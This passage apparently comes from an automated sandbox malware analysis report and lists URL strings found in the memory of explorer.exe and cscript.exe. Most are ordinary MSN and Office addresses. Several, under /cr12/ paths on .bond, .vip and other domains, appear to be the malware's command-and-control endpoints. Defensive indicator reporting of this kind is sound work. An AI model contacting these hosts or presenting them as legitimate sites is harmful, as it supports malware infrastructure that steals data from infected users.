          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.warehouse-inventory-80963.bond
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.warehouse-inventory-80963.bond/cr12/
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.warehouse-inventory-80963.bond/cr12/33333333
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.warehouse-inventory-80963.bondReferer:
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.winningpickleballshots.com
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.winningpickleballshots.com/cr12/
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.winningpickleballshots.com/cr12/www.thetrendingproduct.com
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.winningpickleballshots.comReferer:
          Source: explorer.exe, 00000006.00000003.31961855101.0000000008FDA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30297542388.0000000008FDA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31964592682.000000000905E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35225441200.000000000905F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirm
          Source: explorer.exe, 00000006.00000003.31964592682.00000000090AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30297542388.00000000090AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35225441200.00000000090AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008FDA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
          Source: explorer.exe, 00000006.00000000.30297542388.0000000009263000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35225441200.0000000009263000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31961855101.0000000009263000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?Jl
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=9F0A6F0F4E6E4C6D920024D11021271E&timeOut=5000&oc
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30297542388.0000000009263000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35225441200.0000000009263000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31961855101.0000000009263000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
          Source: explorer.exe, 00000006.00000003.31964592682.00000000090AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30297542388.00000000090AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35225441200.00000000090AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
          Source: explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Stock_In
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/LFlOFwA=/Condition/MostlyCloudyNight.pn
          Source: explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/LFlOFwA=/Condition/MostlyCloudyNight.sv
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/LFlOFwA=/Teaser/humidity.png
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/20240402.1/Weather/W36_Most
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA12QGB8
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA12QGB8-dark
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gD5m
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gD5m-dark
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKhb
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKhb-dark
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMd4
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMd4-dark
          Source: explorer.exe, 00000006.00000003.31961405842.000000000CA90000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35230855468.000000000CA94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959277689.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31967931569.000000000CAB7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31961045545.000000000CA7F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.comJ
          Source: explorer.exe, 00000006.00000003.31967028878.000000000CA4B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.32856007373.000000000CA62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959277689.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35230740761.000000000CA4C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.comi/
          Source: explorer.exe, 00000006.00000002.35229091915.000000000C5E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301008086.000000000C5E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.coml0
          Source: explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://go.redirectingat.com?id=74968X1553576&url=https%3A%2F%2Fwww.harpersbazaar.com%2Ffashion%2Ftr
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://imdb.com/
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA2XNwp.img
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA36Tom.img
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAX9kdV.img
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAywOab.img
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1e6XdQ.img
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1ncRjw.img
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://immieats.com/scishow.
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://metacritic.com/
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://movieweb.com/historically-accurate-war-movies/#we-were-soldiers
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://news.stanford.edu/2023/02/17/will-russia-ukraine-war-end/
          Source: explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ntp.msn.com/edge/ntp?cm=en-us&ocid=widgetonlockscreenwin10&cvid=f49d9883-4f80-4b3c-a960-1e7c
          Source: explorer.exe, 00000006.00000003.31961405842.000000000CA90000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35230855468.000000000CA94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229091915.000000000C5E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31964592682.00000000090AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959277689.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30297542388.00000000090AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31967931569.000000000CAB7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31961045545.000000000CA7F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35225441200.00000000090AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301008086.000000000C5E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
          Source: explorer.exe, 00000006.00000003.31967028878.000000000CA4B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.32856007373.000000000CA62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959277689.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35230740761.000000000CA4C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.comb
          Source: explorer.exe, 00000006.00000003.31958579029.0000000004CBB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30296440713.0000000004CC2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35223272761.0000000004CC2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.comp
          Source: explorer.exe, 00000006.00000003.32855740059.000000000CA90000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31961405842.000000000CA90000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35230855468.000000000CA94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959277689.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31961045545.000000000CA7F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.com
          Source: explorer.exe, 00000006.00000003.31964592682.00000000090AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30297542388.00000000090AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35225441200.00000000090AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.com?
          Source: explorer.exe, 00000006.00000000.30297542388.0000000009263000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35225441200.0000000009263000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31961855101.0000000009263000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.come
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://scishow-tangents.simplecast.com/
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://stacker.com/
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://weathermapdata.blob.core.windows.net/static/finance/1stparty/FinanceTaskbarIcons/Finance_Sto
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-US&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-US&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 00000006.00000003.31961405842.000000000CA90000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31967028878.000000000CA4B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30297542388.0000000009263000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35230855468.000000000CA94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229091915.000000000C5E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.32856007373.000000000CA62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35225441200.0000000009263000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959277689.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31961855101.0000000009263000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31967931569.000000000CAB7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31961045545.000000000CA7F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35230740761.000000000CA4C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301008086.000000000C5E0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://word.office.com
          Source: explorer.exe, 00000006.00000002.35235825828.00000000135EF000.00000004.80000000.00040000.00000000.sdmp, cscript.exe, 00000007.00000002.35221616070.0000000005C5F000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://www.84031.vip/cr12/?XDHHT=HbnK0Ul5FZTLHgSdQ
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.liveabout.com/worst-war-films-of-all-time-3438702
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/entertainment/news/big-bang-theory-fans-congratulate-kaley-cuoco-as-she-an
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/entertainment/news/i-ll-admit-i-blew-it-michael-richards-talks-kramer-viet
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/how-to-look-fabulous-after-60-without-trying-to-l
